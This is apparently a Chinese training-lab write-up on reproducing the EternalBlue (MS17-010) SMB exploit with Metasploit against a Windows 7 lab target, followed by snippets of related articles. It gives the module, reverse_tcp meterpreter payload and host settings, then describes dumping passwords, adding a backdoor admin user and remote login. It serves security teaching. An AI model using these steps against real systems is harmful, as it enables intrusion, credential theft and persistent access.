关键词:
EternalBlue漏洞复现
1. 实训目的
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。学习漏洞原理掌握攻击方法。
2. 实训原理
- 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
- 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码
3. 实训环境
- Kali系统 版本:2.0 IP:192.168.0.145
- Win7系统 IP:192.168.0.130 开放端口:445
- MSF框架版本:4.14.17版本以上
- 安装更新metasploit
。
4. 实训步骤
查看MSF框架版本
在终端输入msfconsole,进入界面如图1所示。
图1
在进行实验时查看数据库连接和配置如图2所示。
图2
搜索ms17_010图3所示。
图3
扫描命令use auxiliary/scanner/smb/smb_ms17_010
攻击命令use exploit/windows/smb/ms17_010_eternalblue
如图4所示
图4
加载攻击模块并配置参数
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.122.130 (靶机的IP)
set lhost 192.168.122.145(发起攻击的主机IP)
set lport 443
图5
发起攻击,成功会反弹shell
输入run或者exploit,结果如图6所示。
图6
获取系统管理密码信息如图7所示。
图7
反弹shell, 种植后门创建一个用户,并查看如图8所示。
图8
加入管理员用户并查看,如图9所示。
图9
创建txt文件,并在kali里截取。如图10所示。
图10
远程登录如图13所示。
图13
本次实验主要是利用永恒之蓝漏洞攻击一台主机,掌握永恒之蓝漏洞原理。
永恒之蓝漏洞原理及复现
一.介绍。1.什么是永恒之蓝。永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wann... 查看详情
ms17-010永恒之蓝病毒复现
...恒之蓝漏洞复现(ms17-010)1.1 漏洞描述:Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电... 查看详情
eternalblue永恒之蓝漏洞利用--洪水猛兽
EternalBlue永恒之蓝漏洞利用0x01漏洞介绍什么是永恒之蓝漏洞:恶意代码利用Windows系统的SMB漏洞可以获取系统最高权限。师傅们扫描开放445(文件及打印机共享)端口的Windows服务器,对该漏洞进行利用后无需用户... 查看详情
ms17-010(永恒之蓝)漏洞分析与复现(代码片段)
...tionalSecurityAgency,美国国家安全局)泄露的漏洞“EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和... 查看详情
关于nsa的eternalblue(永恒之蓝)ms17-010漏洞利用
好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷的用,也可以,可是,... 查看详情
永恒之蓝(ms17-010)漏洞简介及复现
一、永恒之蓝简介与危害永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限... 查看详情
永恒之蓝漏洞利用复现
一、环境搭建:IP地址系统信息备注角色192.168.0.244win7旗舰版(未安装MS17-010补丁版本)需开启445端口及SMB协议靶机192.168.0.105win7旗舰版需安装python2.6.6&pywin32攻击机192.168.0.245kalilinux2.0生成reverseshell的dll文件辅助机二、攻击流程... 查看详情
永恒之蓝ms17-010漏洞复现
MS17_010永恒之蓝漏洞复现目录前言1.准备工作2.漏洞利用步骤前言永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络attack工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以... 查看详情
ms17-010(永恒之蓝)漏洞复现和分析(代码片段)
MS17-010(永恒之蓝)漏洞复现和分析一、漏洞简介1、永恒之蓝介绍:永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利... 查看详情
细谈永恒之蓝,实现复现!!
永恒之蓝定义:永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12... 查看详情
ms17010(永恒之蓝)漏洞复现(代码片段)
MS17010(永恒之蓝)漏洞利用与复现首先需要准备win7的环境做为靶机获取信息利用nmap扫描得到,靶机IPnmap-sP192.168.229.0/24得到:IP:192.168.229.169然后利用:nmap--script=vuln192.168.229.169得到靶机信息:发现可能利用的漏洞&... 查看详情
永恒之蓝ms17-010漏洞利用(代码片段)
前言永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒... 查看详情
永恒之蓝ms17-010漏洞利用(代码片段)
前言永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒... 查看详情
使用kali复现永恒之蓝(代码片段)
使用Kali复现永恒之蓝本次实验为离线靶机测试实验步骤确认测试环境:在开始测试之前,需要确认测试环境是否符合要求。我使用的是一台运行Kali的测试机和一台运行Windows764位的靶机。确保测试机和靶机之间可以进行网络通信... 查看详情
永恒之蓝,17-010漏洞复现,实现远程桌面连接,超详细步骤,小白必看
...找17-010 5、进入这个漏洞:use exploit/windows/smb/ms17_010_eternalblue 6、进入后先:showoptions(查看要设置的参数)7、设置参数 8、show targets(查看可攻击的系统)9、我前边说了,我的靶机是win7,这里... 查看详情
kali利用msf通过win7永恒之蓝漏洞获取权限(代码片段)
...写过博客记录自己的学习了,今天顺手也记录一下。Eternalblue通过TCP端 查看详情
反黑风暴·记一次遭遇ssdpddos和eternalblue(永恒之蓝)攻击经历
反黑风暴·记一次遭遇SSDPDDoS和EternalBlue(永恒之蓝)攻击经历前言故事一:SSDPDDoS故事二:EternalBlue(永恒之蓝)总结参考作者:高玉涵时间:2021.12.0715:45博客:blog.csdn.net/cg_i前言 就在昨天下... 查看详情
局域网永恒之蓝病毒发包的解决方案之二(代码片段)
1.使用shadowbroker的eternalblue还有doublepulsar实现注入到目标机器的进程,然后使用kali下的msf获取到有病毒机器的shell然后修改密码查看问题等.根据网上的教程来进行处理以及复现等教程地址:http://blog.csdn.net/claygrit/article/details/77284739ht... 查看详情